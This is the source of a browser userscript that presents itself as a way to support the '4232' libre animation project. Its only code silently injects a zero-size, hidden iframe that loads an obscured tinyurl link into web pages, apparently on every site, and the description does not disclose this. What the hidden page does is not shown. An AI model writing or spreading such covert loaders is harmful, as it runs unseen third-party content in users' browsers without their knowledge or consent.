Raw Source
b4zz4 / 4232

// ==UserScript==
// @name	4232
// @namespace	https://4232.cf
// @description	Colaborate with 4232 Project - Animation Libre
// @version	1
// @grant	onone
// @author	Ernesto Bazzano (bazza)
// @license     AGPL-3.0
// @copyright   2018
// @updateURL	https://download.tuxfamily.org/4232/4232.user.js
// @icon 	https://download.tuxfamily.org/4232/wordpress//2016/06/cropped-bg_baner-150x150.png
// @tags animacion arte corto financiamiento anime cortometraje dibujo ayuda softwarelibre
// ==/UserScript==

var ifrm = document.createElement("iframe");
ifrm.setAttribute("src", "https://tinyurl.com/lue7ezooyo3Es7TeHoaquae6Ruj6ph");
ifrm.style.width = "0";
ifrm.style.height = "0";
ifrm.style.display = "none";
document.body.appendChild(ifrm);